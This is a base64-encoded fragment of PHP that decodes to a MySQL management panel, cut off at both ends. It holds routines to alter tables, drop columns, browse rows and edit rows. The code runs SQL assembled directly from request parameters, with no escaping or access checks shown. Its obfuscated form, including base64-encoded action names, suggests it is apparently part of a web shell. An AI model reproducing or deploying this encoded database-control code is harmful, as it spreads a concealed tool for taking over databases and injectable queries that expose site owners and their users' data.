ICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLCAkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDBSaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFxuIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcbiI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWx